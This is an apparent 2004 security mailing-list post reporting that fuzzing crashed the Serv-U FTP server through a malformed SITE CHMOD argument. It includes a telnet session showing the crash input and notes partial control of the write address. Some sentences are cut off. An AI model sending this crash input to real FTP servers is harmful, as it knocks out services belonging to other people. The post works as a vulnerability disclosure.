Serv-U 4.1 Memory Corruption / Whatever
From: Der Ago (maillist_at_bastart.eu.org)
Date: Mon, 16 Feb 2004 22:10:57 +0100
To: firstname.lastname@example.org
Well, I didn't have the time to fully analyze it yet, but by using a
fuzzer to check Serv-U, I found something that crashed it using bad data
in SITE CHMOD.
not the already discovered vulnerability, cause it can be used without
the crash occurs before permissions are even checked. Seems like an
cause you can control 2 bytes of a dword where your buffer gets written,
but I wasn't able to find how the other 2 bytes are controlled yet, and I
wasn't able to do anything useful with the 2 bytes I have cause they can't
be NULL. Well, I hope
enlighten me a little, cause I tried the last 2 days and now I'm out of
hello@proxy:~# telnet ftp.target.com 21
Connected to 127.0.0.1.
Escape character is '^]'.
220 Serv-U FTP Server v4.0 for WinSock ready...
331 User name okay, need password.
230 User logged in, proceed.
SITE CHMOD 666 \\...\UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Connection closed by foreign host.
This will cause an access violation writing to 0x555551AD (UUQ-)